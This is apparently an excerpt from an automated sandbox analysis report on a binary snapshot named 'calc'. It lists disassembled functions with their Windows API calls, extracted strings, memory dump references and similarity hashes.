    • DeleteMenu.USER32(0047A6A8,00000004,00000000,?,00000000), ref: 00413019
    • DeleteMenu.USER32(0047A6A8,00000006,00000000,?,00000000), ref: 00413020
    • DeleteMenu.USER32(0047A6A8,00000003,00000000,?,00000000), ref: 00413027
    • GetMenuItemCount.USER32(0047A6A8), ref: 0041302E
    • SetMenuItemInfoW.USER32(0047A6A8,00000004,00000000,0000002C), ref: 00413065
    • GetCursorPos.USER32(?), ref: 0041306F
    • SetForegroundWindow.USER32(?), ref: 00413078
    • TrackPopupMenuEx.USER32(0047A6A8,00000000,?,00000040,?,00000000,?,00000000), ref: 0041308B
    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00413097
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
    • String ID: ,$@
    • API String ID: 1441871840-1227015840
    • Opcode ID: 6fba69342bae33aab1d83c18947fedfc591f4581130f52114987ab3926d0da51
    • Instruction ID: 4df3f0e84d8b0de06bb22b55110f503df572b040d89fde59fd7f95bd6219fecb
    • Opcode Fuzzy Hash: 6fba69342bae33aab1d83c18947fedfc591f4581130f52114987ab3926d0da51
    • Instruction Fuzzy Hash: 7671AE70501248BEEB21DF54CD84FDBBBF8EB05348F20441AF56592291C7B99E95EB28
    Function 0044C499 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 71libraryloadermemoryCOMMON
    Download Yara Rule
    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,74DF0A60,00000000,0044BF78,?,0045B1B8,00000060), ref: 0044C4B1
    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0044C4C9
    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0044C4D6
    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0044C4E3
    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0044C4F0
    • FlsAlloc.KERNEL32(0044C323,?,0045B1B8,00000060), ref: 0044C52D
    • FlsSetValue.KERNEL32(00000000,?,0045B1B8,00000060), ref: 0044C55A
    • GetCurrentThreadId.KERNEL32 ref: 0044C56E
      • Part of subcall function 0044C282: FlsFree.KERNEL32(00000005,0044C583,?,0045B1B8,00000060), ref: 0044C28D
      • Part of subcall function 0044C282: RtlDeleteCriticalSection.KERNEL32(00000000,00000000,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C5EC
      • Part of subcall function 0044C282: RtlDeleteCriticalSection.KERNEL32(00000005,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C616
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll$XF
    • API String ID: 2635119114-2776746379
    • Opcode ID: 6aab792099a48fd3b5fd67e313977c4f19e88fcfdac56340a8163f1b3c9300aa
    • Instruction ID: 5ef84d50a295475a9834f727cfda9a2385d3a30a7da8ed7b00238fe560ffcff3
    • Opcode Fuzzy Hash: 6aab792099a48fd3b5fd67e313977c4f19e88fcfdac56340a8163f1b3c9300aa
    • Instruction Fuzzy Hash: B421B630906711EA97509F7AAC8851A7EA4E741769714067BF818D3261EBB8D804CB5D
    Function 0042B2C3 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 382COMMON
    Download Yara Rule
    APIs
    • 73A1A570.USER32(00000000), ref: 0042B4A8
    • 73A24C40.GDI32(00000007), ref: 0042B50B
    • 73A24D80.GDI32(00000000,00000028,00000000,00000000,00000000,00000000), ref: 0042B51D
    • SelectObject.GDI32(?,00000000), ref: 0042B530
    • 73A24D40.GDI32(?,00000000,00000000,?,?,00000007,?,?,00CC0020), ref: 0042B54C
    • SelectObject.GDI32(?,?), ref: 0042B558
    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0042B581
    • 73A1A480.USER32(00000000,00000007), ref: 0042B58C
    • DeleteObject.GDI32(?), ref: 0042B595
    • DeleteDC.GDI32(?), ref: 0042B59E
    • GetPixel.GDI32(00000007,?,?), ref: 0042B646
    • 73A1A480.USER32(00000000,00000007), ref: 0042B68D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Object$A480DeleteSelect$A570BitsPixel
    • String ID: (
    • API String ID: 2538305491-3887548279
    • Opcode ID: 1ede1aa202dda6cd9a2878055038e253d841300b118e25e7c1fd635c4cc7a0ae
    • Instruction ID: 44a5a25657ab3b2f0f591ab9398c7da86f2146860005dfdfe1139e521f141202
    • Opcode Fuzzy Hash: 1ede1aa202dda6cd9a2878055038e253d841300b118e25e7c1fd635c4cc7a0ae
    • Instruction Fuzzy Hash: FBE18F30E04269EFCF10DFA9D885AEEFBB1FF05314F54806AE450A7252C7789985CB99
    Function 00423E39 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 161COMMON
    Download Yara Rule
    APIs
    • CharLowerBuffW.USER32(?,?,00000000,00000000), ref: 00423E8C
    • GetDriveTypeW.KERNEL32(?,open,close), ref: 00423F02
    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00423F73
    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00423FA6
    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00423FC9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: SendString$BuffCharDriveLowerType
    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
    • API String ID: 1600147383-4113822522
    • Opcode ID: f09bc949fd7f0f0727a94c21cfae5a3c4154d0bc55ced262e02623f3833cc8d9
    • Instruction ID: d880ffdb118256abe20f09d514c1cc5d447d9422aaf319f78db7854ebfdf8fa5
    • Opcode Fuzzy Hash: f09bc949fd7f0f0727a94c21cfae5a3c4154d0bc55ced262e02623f3833cc8d9
    • Instruction Fuzzy Hash: 4351E831A002296ADF10AF65EC41AEF7779AF00725F52451BF811771A1CB7CEE858798
    Function 004545BB Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 99COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0045C340,00000118,0044C951,00000001,00000000,0045B3B0,00000008,00453238), ref: 0045463F
    • _strcat.LIBCMT ref: 00454655
    • _strlen.LIBCMT ref: 00454665
    • _strlen.LIBCMT ref: 00454676
    • _strncpy.LIBCMT ref: 00454690
    • _strlen.LIBCMT ref: 00454699
    • _strcat.LIBCMT ref: 004546B5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: _strlen$_strcat$FileModuleName_strncpy
    • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
    • API String ID: 3058806289-1673886896
    • Opcode ID: f35cfa9155639c3f0f960c9ac473cb2ec7016d31cbdcaadcfc9b8d2793f7a47a
    • Instruction ID: 20cdc24c19fa16f92b1fdee65682d87b56783f751998074f5fad175280d1cb76
    • Opcode Fuzzy Hash: f35cfa9155639c3f0f960c9ac473cb2ec7016d31cbdcaadcfc9b8d2793f7a47a
    • Instruction Fuzzy Hash: 9D31C4719006086FE710AB619C92F9F3768EB46319F10405BF800AA183DB7CEE59CB9D
    Function 00418B39 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 399timeCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 004183F6: VariantClear.OLEAUT32(?), ref: 00418410
    • VariantCopy.OLEAUT32(00000000,00431D12), ref: 00418B96
    • VariantClear.OLEAUT32(00000000), ref: 00418BA6
    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00418C34
    • VarR4FromDec.OLEAUT32(?,00431D12), ref: 00418C8E
    • VariantInit.OLEAUT32(00000000), ref: 00418E76
    • VariantCopy.OLEAUT32(00000000,00431D12), ref: 00418E7F
    • VariantClear.OLEAUT32(00000000), ref: 00418E8F
    • SafeArrayAccessData.OLEAUT32(F006748D,00000000), ref: 00418EAA
    • SafeArrayAccessData.OLEAUT32(F006748D,?), ref: 00418F24
    • SafeArrayAccessData.OLEAUT32(F006748D,?), ref: 00418F92
    • SafeArrayUnaccessData.OLEAUT32(F006748D), ref: 00418FF4
    Strings
    • %4d%02d%02d%02d%02d%02d, xrefs: 00418C5B
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Variant$ArrayDataSafe$AccessClear$CopyTime$FromInitSystemUnaccess
    • String ID: %4d%02d%02d%02d%02d%02d
    • API String ID: 3089604418-1568723262
    • Opcode ID: 9c04509064bcdde93e447a6ffce3eff34cbbee95d4198a1dbe1b22a91852dbc0
    • Instruction ID: f61b0e39ba79fa92f8e0144b1a52bb32301d3f9e329304e71c291f811c95cde8
    • Opcode Fuzzy Hash: 9c04509064bcdde93e447a6ffce3eff34cbbee95d4198a1dbe1b22a91852dbc0
    • Instruction Fuzzy Hash: D7E1AB71600615EFDB10CF69C884BAAB7B4FF09305F1484AEE505DB2A1DB78EC82DB59
    Function 0042B6EB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 263COMMON
    Download Yara Rule
    APIs
    • 73A1A570.USER32(00000000,?), ref: 0042B7BF
    • 73A24C00.GDI32(00000000,?,?), ref: 0042B7CD
    • 73A24C40.GDI32(00000003), ref: 0042B7D9
    • SelectObject.GDI32(00000000,?), ref: 0042B7EC
    • 73A24D40.GDI32(?,00000000,00000000,?,?,00000003,?,?,00CC0020), ref: 0042B808
    • SelectObject.GDI32(?,?), ref: 0042B814
    • GetDIBits.GDI32(?,?,00000000,?,00000000,?,00000000), ref: 0042B847
    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0042B87A
    • DeleteObject.GDI32(?), ref: 0042B886
    • DeleteDC.GDI32(?), ref: 0042B88F
    • 73A1A480.USER32(00000000,00000003), ref: 0042B899
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Object$BitsDeleteSelect$A480A570
    • String ID: (
    • API String ID: 2233309947-3887548279
    • Opcode ID: dafd6fe1172ab86c4af1fdd92eaeec92ac3ea8c0dbfa5b572469cbf51985cf5a
    • Instruction ID: 4e215850921b11dc612f5a2bb87ee72c03226da213aabddab7a15e359a15e70d
    • Opcode Fuzzy Hash: dafd6fe1172ab86c4af1fdd92eaeec92ac3ea8c0dbfa5b572469cbf51985cf5a
    • Instruction Fuzzy Hash: 03A15A71D00219EFCF00DFA5D8848ADBBB5FF84350B54C56AE905A7211D738AA91DF94
    Function 0043B5F6 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 238COMMON
    Download Yara Rule
    APIs
    • CharUpperBuffW.USER32(00000000,?,?,?,?), ref: 0043B60B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: BuffCharUpper
    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$\#F
    • API String ID: 3964851224-1111182645
    • Opcode ID: 60c0a3a05924f396a10f81e6b1d303b08c3e128cf1191e7b742efef2ec0deb99
    • Instruction ID: ab713c0e03b4ebef2095cd19d918e8f5394ede6d00fec2e271b3f25400b9f2ae
    • Opcode Fuzzy Hash: 60c0a3a05924f396a10f81e6b1d303b08c3e128cf1191e7b742efef2ec0deb99
    • Instruction Fuzzy Hash: BB8102315447486AEF25ABA4DC427ED3B60EF45314F14418BED413A2E2C77C9E89C7AA
    Function 00430763 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 138registryshareCOMMON
    Download Yara Rule
    APIs
    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00430838
    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00430853
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00430873
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0043089D
    • CLSIDFromString.OLE32(00000000,?), ref: 004308CA
    • RegCloseKey.ADVAPI32(?), ref: 004308DC
    • RegCloseKey.ADVAPI32(?), ref: 004308E1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
    • String ID: SOFTWARE\Classes\$\$\$\CLSID$\IPC$
    • API String ID: 3030280669-2678712113
    • Opcode ID: 8288d4e53576b5aac5a6aac5a3f4e34611fe2c6f033a0c5e6599fc35a38b997e
    • Instruction ID: e9f791e3af91f90d151af441e719dbce76ac587e37e4bc486b3c1f566675ae6e
    • Opcode Fuzzy Hash: 8288d4e53576b5aac5a6aac5a3f4e34611fe2c6f033a0c5e6599fc35a38b997e
    • Instruction Fuzzy Hash: E5418271900218ABCF21EFE5DC86DEEBBB9EF08754F100166F901A3151DB399E85CB98
    Function 0040ADFC Relevance: 21.1, APIs: 14, Instructions: 123filecommemoryCOMMON
    Download Yara Rule
    APIs
    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407B99,?,?,?), ref: 0040AE1F
    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00407B99,?,?,?,?,?), ref: 0040AE2E
    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,00407B99,?,?,?,?,?), ref: 0040AE3A
    • GlobalLock.KERNEL32(00000000), ref: 0040AE43
    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00407B99,?,?,?,?,?), ref: 0040AE53
    • GlobalUnlock.KERNEL32(00000000), ref: 0040AE5A
    • CloseHandle.KERNEL32(00000000,?,?,?,00407B99,?,?,?,?,?), ref: 0040AE61
    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,00407B99,?,?,?,?,?), ref: 0040AE6E
    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0045AEA8,?), ref: 0040AE82
    • GlobalFree.KERNEL32(00000000), ref: 0040AE92
    • GetObjectW.GDI32(?,00000018,?), ref: 0040AEB9
    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0040AEF0
    • DeleteObject.GDI32(?), ref: 0040AF12
    • SendMessageW.USER32(?,00000172,00000000,?), ref: 0040AF28
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
    • String ID:
    • API String ID: 3969911579-0
    • Opcode ID: 49c49731e839cb7fe105a19153864ee00061c65c46ae88794a82da1298d8b0f8
    • Instruction ID: cb8fd9a0ce4e2b5bf979152b6b69ba6d5677fcb9638b9655bdc767c6ac9b755b
    • Opcode Fuzzy Hash: 49c49731e839cb7fe105a19153864ee00061c65c46ae88794a82da1298d8b0f8
    • Instruction Fuzzy Hash: C3413475900319FFCB119FA0CC88DAEBBB9EF89312B2044A5F505E72A1D7359D02CBA4
    Function 00455EDD Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(user32.dll,0045BFD0,?,?), ref: 00455EF5
    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00455F11
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00455F22
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00455F2F
    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00455F45
    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00455F56
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad
    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
    • API String ID: 2238633743-1612076079
    • Opcode ID: 7611b16ea55112288e4e24d76ec937120c27eb8a9d56c1d51c026ca64dbdc89f
    • Instruction ID: 4e8962c2657cc3db2d1b492644d61bf7130a5013e907e64669c8747346af678d
    • Opcode Fuzzy Hash: 7611b16ea55112288e4e24d76ec937120c27eb8a9d56c1d51c026ca64dbdc89f
    • Instruction Fuzzy Hash: 0321C872205705AFEB109FB59C94E3B3BE89B05746B10043BED00D2152E7BCC84C9B6E
    Function 004149FA Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 80sleeptimewindowCOMMON
    Download Yara Rule
    APIs
    • timeGetTime.WINMM ref: 00414A04
    • timeGetTime.WINMM ref: 00414A1A
    • Sleep.KERNEL32(0000000A), ref: 00414A2E
    • 73A25940.USER32(?,Function_00014AF8,00000000), ref: 00414A50
    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00414A72
    • SetActiveWindow.USER32 ref: 00414A93
    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00414AA1
    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00414AC1
    • Sleep.KERNEL32(000000FA), ref: 00414ACC
    • IsWindow.USER32 ref: 00414AD8
    • EndDialog.USER32(00000000), ref: 00414AE9
      • Part of subcall function 00415D17: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00415D3E
      • Part of subcall function 00415D17: GetCurrentThreadId.KERNEL32 ref: 00415D45
      • Part of subcall function 00415D17: AttachThreadInput.USER32(00000000), ref: 00415D4C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Window$Thread$MessageSendSleepTimetime$A25940ActiveAttachCurrentDialogFindInputProcess
    • String ID: BUTTON
    • API String ID: 2608405177-3405671355
    • Opcode ID: 9d3f59f38da363da99795c867b164ececa99e12e4f25dd3b184a9f13c30bfd9f
    • Instruction ID: d49f01f2a66b3b3a274d5297f5f74a72a47ae71303348ed1a4dedd9e64d469b0
    • Opcode Fuzzy Hash: 9d3f59f38da363da99795c867b164ececa99e12e4f25dd3b184a9f13c30bfd9f
    • Instruction Fuzzy Hash: C621C532398605FFF7116F20FE899AA3BA8EBC4382B110476F20591471D7658DD09B2C
    Function 0043936F Relevance: 19.9, APIs: 13, Instructions: 361COMMON
    Download Yara Rule
    APIs
    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00439448
    • CloseHandle.KERNEL32(?), ref: 0043951D
    • FreeLibrary.KERNEL32(?), ref: 0043953D
    • FreeLibrary.KERNEL32(?), ref: 00439547
    • FreeLibrary.KERNEL32(?,00000000), ref: 00439574
      • Part of subcall function 00416372: LoadLibraryA.KERNEL32(kernel32.dll,0041461F,74DF0F00,00479E08), ref: 0041637D
      • Part of subcall function 00416372: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041638F
    • FreeLibrary.KERNEL32(?,00000000), ref: 0043957E
    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 0043969F
    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 004396B4
    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 004396BF
    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 004396CA
    • FreeLibrary.KERNEL32(?,00000000), ref: 004397CB
    • FreeLibrary.KERNEL32(?,00000000), ref: 004397D5
      • Part of subcall function 00416399: LoadLibraryA.KERNEL32(kernel32.dll,00414630,74DF0F00,00479E08), ref: 004163A4
      • Part of subcall function 00416399: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004163B6
      • Part of subcall function 004163C0: LoadLibraryA.KERNEL32(kernel32.dll,00414641,74DF0F00,00479E08), ref: 004163CB
      • Part of subcall function 004163C0: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004163DD
    • FreeLibrary.KERNEL32(?,00000000), ref: 004397DF
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
